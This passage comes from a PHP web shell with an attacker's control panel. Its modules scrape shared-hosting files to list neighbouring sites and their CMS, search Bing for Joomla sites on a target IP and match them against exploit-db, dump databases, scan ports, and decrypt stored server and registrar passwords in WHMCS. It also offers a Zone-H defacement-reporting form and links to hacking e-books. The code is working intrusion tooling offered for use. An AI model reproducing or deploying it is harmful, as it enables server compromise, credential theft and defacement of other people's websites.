  2176.     <td valign="top" bgcolor="#151515" colspan="5">
  2177.     <strong>
  2178. <form method="POST" target="_blank">
  2179.     <strong>
  2180. <input name="matikan" type="hidden" value="sekatan">                       
  2181.     </strong>
  2182.  
  2183. <?php if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#FF0000>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  2184.    </strong>
  2185.    </td></tr>'; } ?></strong></td></tr></table></table></table>
  2186. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor')) { ?>
  2187.     <form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
  2188.     <center><br><br><b>--=[ Tutorial & Ebook hacking ]=--</b><br>
  2189.         <form method="post" action="">
  2190. <table class="tabnet" border="1" >
  2191. <tr>
  2192.         <td align="center">English</td><td align="center">Indonesian</td>
  2193.     </tr>
  2194.     <tr>
  2195.         <td><form method="post" action="">&nbsp;
  2196.     E-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2197.     <select class="inputzbut" name="pilih" id="pilih">
  2198.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2199.     <option value="tutorial24" > Hacking Exposed-5 </option>
  2200.     <option value="tutorial25"> Internet Denial Of Service </option>
  2201.     <option value="tutorial26">Computer Viruses For Dummies</option>
  2202.     <option value="tutorial27">Hack Attacks Testing</option>
  2203.     <option value="tutorial28">Secrets Of A Super Hacker</option>
  2204.     <option value="tutorial29">Stealing The Network</option>
  2205.     <option value="tutorial30">Hacker's HandBook</option>
  2206.     </select>
  2207.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2208.     </td></form>
  2209. <td><form method="post" action="">&nbsp;
  2210. Tutorial &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2211.     <select class="inputzbut"  name="pilih" id="pilih">
  2212.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2213.         <option value="tutorial2">Search Engine Hacking</option>
  2214.         <option value="tutorial3">SQL Injection dengan hackbar</option>
  2215.         <option value="tutorial1" >Bypass Union</option>
  2216.     </select>
  2217.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2218. </form></td>
  2219. </tr>
  2220. <tr>
  2221. <td>
  2222. <form method="post" action="">&nbsp;
  2223. E-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2224.     <select class="inputzbut"  name="pilih" id="pilih">
  2225.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2226.     <option value="cryptography_for_defeloper">Cryptography for Developer</option>
  2227.     <option value="tutorial31">Mobile Malware Attack and Defense</option>
  2228.     <option value="forensic">CD and DVD Forensic</option>
  2229.     <option value="ddd">Open Sourch Security Tools</option>
  2230.     <option value="metasploit">Metaslpoit Toolkit</option>
  2231.     <option value="stealing_network">Stealing the Network</option>
  2232.     <option value="security_polices">Creating Security Polices</option>
  2233.     </select>
  2234.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2235. </form></td>
  2236. <td>
  2237. <form method="post" action="">&nbsp;
  2238. X-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2239.     <select class="inputzbut" name="pilih" id="pilih">
  2240.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2241.     <option value="tutorial4">X-CODE MAGAZINE 1</option>
  2242.     <option value="tutorial5">X-CODE MAGAZINE 2</option>
  2243.     <option value="tutorial6">X-CODE MAGAZINE 3</option>
  2244.     <option value="tutorial7">X-CODE MAGAZINE 4</option>
  2245.     <option value="tutorial8">X-CODE MAGAZINE 5</option>
  2246.     <option value="tutorial9">X-CODE MAGAZINE 6</option>
  2247.     <option value="tutorial10">X-CODE MAGAZINE 7</option>
  2248.     <option value="tutorial11">X-CODE MAGAZINE 8</option>
  2249.     <option value="tutorial12">X-CODE MAGAZINE 9</option>
  2250.     <option value="tutorial13">X-CODE MAGAZINE 10</option>
  2251.     <option value="tutorial14">X-CODE MAGAZINE 11</option>
  2252.     <option value="tutorial15">X-CODE MAGAZINE 12</option>
  2253.     <option value="tutorial16">X-CODE MAGAZINE 13</option>
  2254.     <option value="tutorial17">X-CODE MAGAZINE 14</option>
  2255.     <option value="tutorial18">X-CODE MAGAZINE 15</option>
  2256.     <option value="tutorial19">X-CODE MAGAZINE 16</option>
  2257.     <option value="tutorial20">X-CODE MAGAZINE 17</option>
  2258.     <option value="tutorial21">X-CODE MAGAZINE 18</option>
  2259.     <option value="tutorial22">X-CODE MAGAZINE 19</option>
  2260.     <option value="tutorial23">X-CODE MAGAZINE 20</option>
  2261.     <option value="tutorial024">X-CODE MAGAZINE 21</option>
  2262.     </select>
  2263.     <input type="submit" name="submit" class="inputzbut" value="Download" ></a>
  2264. </form></td></tr></table><br><br>
  2265. <?php $submit = $_POST ['submit']; if(isset($submit)) { $pilih = $_POST['pilih']; if ( $pilih == 'tutorial1') { ?>
  2266.             <script>
  2267.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
  2268.             </script>
  2269.             <?php  } elseif ( $pilih == 'tutorial2') { ?>
  2270.             <script>
  2271.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
  2272.             </script>
  2273.             <?php  } elseif ( $pilih == 'tutorial3') { ?>
  2274.             <script>
  2275.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
  2276.             </script>
  2277.             <?php  } elseif ( $pilih == 'tutorial4') { ?>
  2278.             <script>
  2279.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_1.zip';
  2280.             </script>
  2281.             <?php  } elseif ( $pilih == 'tutorial5') { ?>
  2282.             <script>
  2283.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_2.zip';
  2284.             </script>
  2285.             <?php  } elseif ( $pilih == 'tutorial6') { ?>
  2286.             <script>
  2287.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_3.zip';
  2288.             </script>
  2289.             <?php  } elseif ( $pilih == 'tutorial7') { ?>
  2290.             <script>
  2291.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_4.zip';
  2292.             </script>
  2293.             <?php  } elseif ( $pilih == 'tutorial8') { ?>
  2294.             <script>
  2295.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_5.rar';
  2296.             </script>
  2297.             <?php  } elseif ( $pilih == 'tutorial9') { ?>
  2298.             <script>
  2299.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_6.rar';
  2300.             </script>
  2301.             <?php  } elseif ( $pilih == 'tutorial10') { ?>
  2302.             <script>
  2303.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_7.rar';
  2304.             </script>
  2305.             <?php  } elseif ( $pilih == 'tutorial11') { ?>
  2306.             <script>
  2307.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_8.rar';
  2308.             </script>
  2309.             <?php  } elseif ( $pilih == 'tutorial12') { ?>
  2310.             <script>
  2311.                 document.location = 'hxxp://xcode.or.id/files/xcode9.zip';
  2312.             </script>
  2313.             <?php  } elseif ( $pilih == 'tutorial13') { ?>
  2314.             <script>
  2315.                 document.location = 'hxxp://xcode.or.id/files/xcode10.zip';
  2316.             </script>
  2317.             <?php  } elseif ( $pilih == 'tutorial14') { ?>
  2318.             <script>
  2319.                 document.location = 'hxxp://xcode.or.id/files/xcode11.zip';
  2320.             </script>
  2321.             <?php  } elseif ( $pilih == 'tutorial15') { ?>
  2322.             <script>
  2323.                 document.location = 'hxxp://xcode.or.id/files/Xcode12.zip';
  2324.             </script>
  2325.             <?php  } elseif ( $pilih == 'tutorial16') { ?>
  2326.             <script>
  2327.                 document.location = 'hxxp://xcode.or.id/files/Xcode13.zip';
  2328.             </script>
  2329.             <?php  } elseif ( $pilih == 'tutorial17') { ?>
  2330.             <script>
  2331.                 document.location = 'hxxp://xcode.or.id/files/Xcode14.zip';
  2332.             </script>
  2333.             <?php  } elseif ( $pilih == 'tutorial18') { ?>
  2334.             <script>
  2335.                 document.location = 'hxxp://xcode.or.id/Xcode15.zip';
  2336.             </script>
  2337.             <?php  } elseif ( $pilih == 'tutorial19') { ?>
  2338.             <script>
  2339.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_16.zip';
  2340.             </script>
  2341.             <?php  } elseif ( $pilih == 'tutorial20') { ?>
  2342.             <script>
  2343.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_17.zip';
  2344.             </script>
  2345.             <?php  } elseif ( $pilih == 'tutorial21') { ?>
  2346.             <script>
  2347.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_18.zip';
  2348.             </script>
  2349.             <?php  } elseif ( $pilih == 'tutorial22') { ?>
  2350.             <script>
  2351.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_19.zip';
  2352.             </script>
  2353.             <?php  } elseif ( $pilih == 'tutorial23') { ?>
  2354.             <script>
  2355.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_20.zip';
  2356.             </script>
  2357.             <?php  } elseif ( $pilih == 'tutorial024') { ?>
  2358.             <script>
  2359.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_21.zip';
  2360.             </script>
  2361.             <?php  } elseif ( $pilih == 'tutorial24') { ?>
  2362.             <script>
  2363.                 document.location = 'hxxp://www.insecure.in/ebooks/hacking_exposed_5.rar';
  2364.             </script>
  2365.             <?php  } elseif ( $pilih == 'tutorial25') { ?>
  2366.             <script>
  2367.                 document.location = 'hxxp://www.insecure.in/ebooks/internet_denial_of_service.rar';
  2368.             </script>
  2369.             <?php  } elseif ( $pilih == 'tutorial26') { ?>
  2370.             <script>
  2371.                 document.location = 'hxxp://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
  2372.             </script>
  2373.             <?php  } elseif ( $pilih == 'tutorial27') { ?>
  2374.             <script>
  2375.                 document.location = 'hxxp://www.insecure.in/ebooks/hack_attacks_testing.rar';
  2376.             </script>
  2377.             <?php  } elseif ( $pilih == 'tutorial28') { ?>
  2378.             <script>
  2379.                 document.location = 'hxxp://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
  2380.             </script>
  2381.             <?php  } elseif ( $pilih == 'tutorial29') { ?>
  2382.             <script>
  2383.                 document.location = 'hxxp://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
  2384.             </script>
  2385.             <?php  } elseif ( $pilih == 'tutorial30') { ?>
  2386.             <script>
  2387.                 document.location = 'hxxp://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
  2388.             </script>
  2389.             <?php  } elseif ( $pilih == 'ddd') { ?>
  2390.             <script>
  2391.                 document.location = 'hxxp://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
  2392.             </script>
  2393.             <?php  } elseif ( $pilih == 'tutorial31') { ?>
  2394.             <script>
  2395.                 document.location = 'hxxp://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
  2396.             </script>
  2397.             <?php  } elseif ( $pilih == 'cryptography_for_defeloper') { ?>
  2398.             <script>
  2399.                 document.location = 'hxxp://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
  2400.             </script>
  2401.             <?php  } elseif ( $pilih == 'forensic') { ?>
  2402.             <script>
  2403.                 document.location = 'hxxp://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
  2404.             </script>
  2405.             <?php  } elseif ( $pilih == 'metasploit') { ?>
  2406.             <script>
  2407.                 document.location = 'hxxp://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
  2408.             </script>
  2409.             <?php  }elseif ( $pilih == 'stealing_network') { ?>
  2410.             <script>
  2411.                 document.location = 'hxxp://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
  2412.             </script>
  2413.             <?php  }elseif ( $pilih == 'security_polices') { ?>
  2414.             <script>
  2415.                 document.location = 'hxxp://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
  2416.             </script>
  2417.             <?php  } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect')) { ?>
  2418.     <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
  2419.     <br><br><br><br><center><b><font size=4>--=[ CMS Detector ]=--</font></b></center><br><br>
  2420.     <?php if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>'; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>'; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'jss')) { ?>
  2421.     <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
  2422.     <?php  echo '
  2423.  
  2424. <br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
  2425. <form method="POST">
  2426.        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
  2427. </form><center>
  2428.  
  2429. '; @set_time_limit(0); @error_reporting(E_ALL | E_NOTICE); function check_exploit($comxx){ $link ="hxxp://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($link); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='hxxp://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>"; }else{ echo"<td><a href='$link'>Found</a></td><td><=</td></tr>"; } } function check_com($url){ $source = @file_get_contents($url); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; check_exploit($comm); } } function sec($site){ preg_match_all('{hxxp://(.*?)(/index.php)}siU',$site, $sites); if(eregi("www",$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); }else{ return $site=str_replace("hxxp://","hxxp://www.",str_replace("index.php","",$sites[0][0])); }} $npages = 50000; if ($_POST) { $ip = trim(strip_tags($_POST['site'])); $npage = 1; $allLinks = array(); while($npage <= $npages) { $x=@file_get_contents('hxxp://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage); if ($x) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink); foreach ($findlink[1] as $fl) $allLinks[]=sec($fl); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0) break; } else break; } $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } echo'<table border="1"  width=\"80%\" align=\"center\">
  2430. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>                    
  2431. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  2432. </table>'; echo "<br><br>"; echo'<table border="1" width="80%" align=\"center\">'; foreach(array_unique($allDmns) as $h3h3){ echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>'; check_com($h3h3); } echo"</table>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
  2433.     <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
  2434.     <?php echo $head.'<p align="center">'; echo '
  2435. <table width=371 class=tabnet >
  2436. <tr><th colspan="2">Database Dump</th></tr>
  2437. <tr>
  2438.     <td>Server </td>
  2439.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  2440.     <td>Username</td>
  2441.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  2442.     <td>Password</td>
  2443.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  2444.     <td>DataBase Name</td>
  2445.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
  2446.     <tr>
  2447.     <td>DB Type </td>
  2448.     <td><form method=post action="'.$me.'">
  2449.     <select class="inputz" name=method>
  2450.         <option  value="gzip">Gzip</option>
  2451.         <option value="sql">Sql</option>
  2452.         </select>
  2453.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  2454.     </form></center></table>'; if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc')) { ?>
  2455.     <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
  2456.     <?php  echo '<br><br><center><br><b>--==[ Port Scanner ]==--</b><br>'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is <font color=green>open</font><br>'; } flush(); } }else{ echo '<table class=tabnet style="width:300px;padding:0 1px;">
  2457.   <input type="hidden" name="y" value="phptools">
  2458.   <tr><th colspan="5">Port Scanner</th></center></tr>
  2459.   <tr>
  2460.         <td>Host</td>
  2461.         <td><input type="text" class="inputz"  style="width:220px;color:#FF0000;" name="host" value="localhost"/></td>
  2462.   </tr>
  2463.   <tr>
  2464.         <td>Port start</td>
  2465.         <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
  2466.   </tr>
  2467.     <tr><td>Port end</td>
  2468.         <td><input type="text" class="inputz"  style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
  2469.   </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
  2470.   </td></form></center></table>'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hash')) { $submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash("md4",$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash("sha256",$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '<form action="" method="post"><b><table class=tabnet>'; echo '<tr><th colspan="2">Password Hash</th></center></tr>'; echo '<tr><td><b>Enter the word you want to encrypt:</b></td>'; echo '<td><input class="inputz" type="text" name="password" size="40" />'; echo '<input class="inputzbut" type="submit" name="enter" value="hash" />'; echo '</td></tr><br>'; echo '<tr><th colspan="2">Hash Result</th></center></tr>'; echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>'; echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>'; echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>'; echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>'; echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs')) { ?>
  2471. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2472.  
  2473. <?php  function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash ($key); $hash_length = strlen ($hash_key); $string = base64_decode ($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; } function _hash ($string) { if (function_exists ('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } echo "
  2474. <br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
  2475. <center>
  2476. <br>
  2477.  
  2478. <FORM action=''  method='post'>
  2479. <input type='hidden' name='form_action' value='2'>
  2480. <br>
  2481. <table class=tabnet style=width:320px;padding:0 1px;>
  2482. <tr><th colspan=2>WHMCS Decoder</th></tr>
  2483. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2484. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  2485. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  2486. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  2487. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  2488. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  2489. </table>
  2490. </FORM>
  2491. </center>
  2492. "; if($_POST['form_action'] == 2 ) { $db_host=($_POST['db_host']); $db_username=($_POST['db_username']); $db_password=($_POST['db_password']); $db_name=($_POST['db_name']); $cc_encryption_hash=($_POST['cc_encryption_hash']); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>Type</td><td>$type</td></tr>"); echo("<tr><td>Active</td><td>$active</td></tr>"); echo("<tr><td>Hostname</td><td>$hostname</td></tr>"); echo("<tr><td>Ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>Username</td><td>$username</td></tr>"); echo("<tr><td>Password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblregistrars"); echo("<center>Domain Reseller <br><table class=tabnet border='1'>"); echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'zone')) { ?>
  2493. <form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">
  2494.  
  2495. <br><br><center>
  2496. <!-- Zone-H -->
  2497. <form action="" method='POST'><table><table class='tabnet'><tr>
  2498. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
  2499. <input type="text" class="inputz" name="defacer" value="Nama Defacer" />
  2500. <select name="hackmode" class="inputz" >
  2501. <option >------------------------Choose Any------------------------</option>
  2502. <option value="1">Known Vulnerability (i.e. unpatched system)</option>
  2503. <option value="2" >Undisclosed (new) vulnerability</option>
  2504. <option value="3" >Configuration / Admin. Mistake</option>
  2505. <option value="4" >Brute Force Attack</option>
  2506. <option value="5" >Social Engineering</option>
  2507. <option value="6" >Web Server Intrusion</option>
  2508. <option value="7" >Web Server External Module Intrusion</option>
  2509. <option value="8" >Mail Server Intrusion</option>
  2510. <option value="9" >FTP Server Intrusion</option>
  2511. <option value="10" >SSH Server Intrusion</option>
  2512. <option value="11" >Telnet Server Intrusion</option>
  2513. <option value="12" >RPC Server Intrusion</option>
  2514. <option value="13" >Shares Misconfiguration</option>
  2515. <option value="14" >Other Server Intrusion</option>
  2516. <option value="15" >SQL Injection</option>
  2517. <option value="16" >URL Poisoning</option>
  2518. <option value="17" >File Inclusion</option>
  2519. <option value="18" >Other Web Application Bug</option>
  2520. <option value="19" >Remote Administrative Panel Access Bruteforcing</option>
  2521. <option value="20" >Remote Administrative Panel Access Password Guessing</option>
  2522. <option value="21" >Remote Administrative Panel Access Social Engineering</option>
  2523. <option value="22" >Attack Against Administrator(password stealing/sniffing)</option>
  2524. <option value="23" >Access Credentials Through Man In the Middle Attack</option>
  2525. <option value="24" >Remote Service Password Guessing</option>
  2526. <option value="25" >Remote Service Password Bruteforce</option>
  2527. <option value="26" >Rerouting After Attacking The Firewall</option>
  2528. <option value="27" >Rerouting After Attacking The Router</option>
  2529. <option value="28" >DNS Attack Through Social Engineering</option>
  2530. <option value="29" >DNS Attack Through Cache Poisoning</option>
  2531. <option value="30" >Not Available</option>
  2532. </select>
  2533.  
  2534. <select name="reason" class="inputz" >
  2535. <option >-------------Choose Any---------------</option>
  2536. <option value="1" >Heh...just for fun!</option>
  2537. <option value="2" >Revenge against that website</option>
  2538. <option value="3" >Political reasons</option>
  2539. <option value="4" >As a challenge</option>
  2540. <option value="5" >I just want to be the best defacer</option>
  2541. <option value="6" >Patriotism</option>
  2542. <option value="7" >Not available</option>
  2543. </select>
  2544. <input type="hidden" name="action" value="zone">
